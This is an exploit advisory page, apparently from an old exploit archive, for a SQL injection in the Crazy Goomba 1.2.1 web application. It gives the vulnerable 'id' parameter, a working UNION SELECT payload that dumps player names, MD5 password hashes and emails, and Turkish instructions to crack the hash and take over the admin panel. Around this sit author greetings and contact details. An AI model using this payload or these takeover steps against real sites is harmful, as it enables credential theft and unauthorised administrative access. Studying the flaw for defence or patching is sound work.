Crazy Goomba 1.2.1 (id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Crazy Goomba 1.2.1 (id) Remote SQL Injection Vulnerability
# Published : 2008-04-21
# Author : ZoRLu
# Previous Title : BlogWorx 1.0 (view.asp id) Remote SQL Injection Vulnerability
# Next Title : RedDot CMS 7.5 (LngId) Remote SQL Injection Exploit

##########CANAKKALE GECiLMEZ##############################

Crazy Goomba 1.2.1 SQL inj

dork:  :((  sory

author: ZoRLu 

home: ( http://www.z0rlu.ownspace.org ) ( yildirimordulari.org ) ( r00tsecurity.org ) ( securityfocus.com )

contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn )

Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... La benden keylog isyetesiniz diye vermiyorum msn i. sacmalamayIn da  :((

Not: http://www.z0rlu.ownspace.org   acIklar??n kullanImI ile ilgili bilgiler blogumda mevcut! naparsIn para yokk free actIk :))

###################CANAKKALE GECiLMEZ###################

http://localhost/Crazy_Goomba_1.2.1_path/commentaires.php?id=[SQL]


[SQL]


1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**



( [SQL] yazan yere kodu yaz admin name, password(md5) ve email adresine ulas )

md5 i k??r ve giris yap

http://localhost/Crazy_Goomba_1.2.1_path/index.php?page=connexion  ( login )


sonra admin panele baglan


admin panel: 


http://localhost/Crazy_Goomba_1.2.1_path/administration/admin.php



###################CANAKKALE GECiLMEZ####################

thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK, kasIrga(lavrens), w3R3m

avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org

O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :))  )

Efsane: YILDIRIMORDULARI.ORG

Dersler BasladI Sanal Bitti  :(((

###################CANAKKALE GECiLMEZ####################

# www.Syue.com [2008-04-21]